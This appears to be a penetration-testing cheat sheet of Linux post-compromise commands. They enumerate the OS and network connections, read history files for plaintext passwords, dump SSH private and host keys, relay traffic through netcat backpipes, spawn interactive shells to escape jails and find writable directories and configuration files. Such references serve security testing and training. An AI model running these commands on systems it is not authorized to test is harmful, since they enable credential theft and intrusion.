Below are some useful Linux commands for penetration testing, target reconnaissance and capability assessment. Use them for good, not for evil. Part 1 is here.
Identify operating system, kernel version
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ cat /proc/version
$ uname -a
$ uname -mrs
$ rpm -q kernel
$ dmesg | grep Linux
$ ls /boot | grep vmlinuz-
Identify what other users and hosts are communicating with the system.
$ lsof -i
$ lsof -i :80
$ grep 80 /etc/services
$ chkconfig --list
$ chkconfig --list | grep 3:on
$ last
$ w
$ netstat -antup
$ netstat -antpx
$ netstat -tulpn
Use scp to copy to/from remote machine.
# Copy remote file to local host:
$ scp [email protected]:<remote_file> /some/local/directory
# Copy local file to remote host:
$ scp <local_file> [email protected]:/some/remote/directory
# Copy local directory to remote directory:
$ scp -r <local_dir> [email protected]:/some/remote/directory/<remote_dir>
# Copy a file from one remote host to another:
$ scp your_username@<host1>:/some/remote/directory/stuff.txt your_username@<host2>:/some/remote/directory/
# Improve scp performance (use blowfish):
$ scp -c blowfish <local_file> [email protected]:/some/remote/directory
If port forwarding is possible, redirect and interact with traffic from another view.
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
$ ssh -L 8080:127.0.0.1:80 [email protected] # Local Port
$ ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
$ mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Retrieve cached IP and/or MAC addresses.
$ route
$ /sbin/route -nee
$ arp -e
What has the user being doing? Any password in plain text?
$ cat ~/.bash_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.mysql_history
$ cat ~/.php_history
Retrieve useful user information
$ cat ~/.bashrc
$ cat ~/.profile
$ cat /var/mail/root
$ cat /var/spool/mail/root
Get any private/public key information
$ cat ~/.ssh/authorized_keys
$ cat ~/.ssh/identity.pub
$ cat ~/.ssh/identity
$ cat ~/.ssh/id_rsa.pub
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/id_dsa.pub
$ cat ~/.ssh/id_dsa
$ cat /etc/ssh/ssh_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key
$ cat /etc/ssh/ssh_host_key.pub
$ cat /etc/ssh/ssh_host_key
If in a jail, can you break out of it?
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ echo os.system('/bin/bash')
$ /bin/sh -i
Where can written to and executed from?
A few ‘common’ places: /tmp, /var/tmp, /dev/shm
$ find / -writable -type d 2>/dev/null # world-writeable folders
$ find / -perm -222 -type d 2>/dev/null # world-writeable folders
$ find / -perm -o+w -type d 2>/dev/null # world-writeable folders
$ find / -perm -o+x -type d 2>/dev/null # world-executable folders
$ find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Which configuration files can be written in /etc/? Are we able to reconfigure a service?
$ ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
$ ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
$ ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
$ ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
$ find /etc/ -readable -type f 2>/dev/null # Anyone
$ find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
\